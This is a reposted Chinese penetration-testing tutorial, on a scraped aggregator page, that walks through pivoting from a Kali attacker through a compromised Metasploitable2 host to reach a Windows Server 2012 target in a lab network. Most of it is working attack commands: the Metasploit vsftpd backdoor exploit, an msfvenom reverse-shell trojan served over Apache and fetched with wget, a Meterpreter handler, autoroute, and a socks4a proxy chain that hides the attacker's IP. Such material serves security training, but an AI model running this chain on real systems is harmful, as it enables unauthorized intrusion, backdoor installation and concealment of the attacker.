渗透之 您所在的位置:网站首页 在线攻击服务器怎么设置的 渗透之

渗透之

2024-07-10 23:28| 来源: 网络整理| 查看: 265

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550

攻击机:Kali 192.168.75.10

跳板: Metasploitable2 192.168.75.130

目标机: Windows Server 2012 192.168.75.140

这里无法通过Kali(192.168.75.10)主机直接访问目标机(192.168.75.140),目标机只能通过跳板(192.168.75.130)访问,这里Kali(192.168.75.10)已经成功渗透跳板(192.168.75.130)主机,需要将已渗透主机(192.168.75.130)设置为跳板来访问目标机(192.168.75.140)。

如果直接通过攻击机(192.168.75.10)访问目标机(192.168.75.140),会出现如下错误:

这里,跳板(192.168.75.130)拥有连接目标机(192.168.75.140)权限。因此需要一些方法将我们对目标机(192.168.75.140)发起的请求通过跳板(192.168.75.130)转发出去,需要的这种技术方法就是跳板技术。

这里,我们首先要渗透跳板(192.168.75.130)主机。具体步骤如下:

1.开启MSF msfconsole 2.扫描指定主机的服务和端口 nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130

如果要存入MSF的数据库,则:

db_nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130 3.列出在目标端口上运行的服务 services 4.过滤服务,只显示开启的服务 services -u 5.列出数据库中所有的主机 hosts 6.漏洞攻击 use exploit/unix/ftp/vsftpd_234_backdoor show options set RHOST 192.168.75.130 set RPORT 21 show payloads set payload cmd/unix/interact exploit

注:所有操作都是在MSF终端下

这里,我们继续将Shell控制升级为Meterpreter命令行。

在攻击机Kali上重新开启一个终端:

7.生成反弹木马 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.75.10 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系统下的默认扩展名

8.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中 service apache2 start mv backdoor.elf /var/www/html/

这样,就可以让目标系统从我们的计算机中下载这个木马文件了。

9.在目标机上下载木马文件

切换到第6步的终端,执行命令:

wget http://192.168.75.10/backdoor.elf

即将木马文件下载到了目标机上

10.在新开启的终端上执行如下命令 msfconsole use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.75.10 set LPORT 4444 exploit 11.在目标机上运行木马文件

切换到第6步的终端,执行命令:

chmod 7777 backdoor.elf ./backdoor.elf 12.查看反弹的Meterpreter终端

回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。

接下来,就可以在Meterpreter终端进行操作了。

下面,我们需要执行autoroute脚本,并使用-s将脚本的参数设定为目标主机(192.168.75.140)的IP地址,这样我们就可以在已经被我们渗透的跳板机(192.168.75.130)上添加一条到达目标主机(192.168.75.140)的路由。

13.添加路由 run autoroute -p run autoroute -s 192.168.75.140 run autoroute -p

以攻击者(192.168.75.10)的角度看,现在需要启动一个可以将请求通过Meterpreter发送给目标的模块。可以选择auxiliary/server/socks4a这个模块。

14.启动监听

在攻击机(192.168.75.10)上执行如下命令:

use auxiliary/server/socks4a show options set SRVHOST 127.0.0.1 set SRVPORT 1080 run 15.配置攻击机(192.168.75.10)/etc/proxychains.conf

添加下面一行配置:

socks4 127.0.0.1 1080

16.配置Forefox代理

再一次打开目标服务器(192.168.75.140)的限制目录下的网页。

这里,我们就可以访问了。

接下来,我们访问下目标服务器(192.168.75.140)服务器的IP记录器,如下:

可以看到是跳板(192.168.75.130)的IP地址,不管我们对目标服务器(192.168.75.140)做了什么,对目标服务器(192.168.75.140)眼中这一切都是跳板机(192.168.75.130)做的。然而,我们的真实IP确是192.168.75.10。

 



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有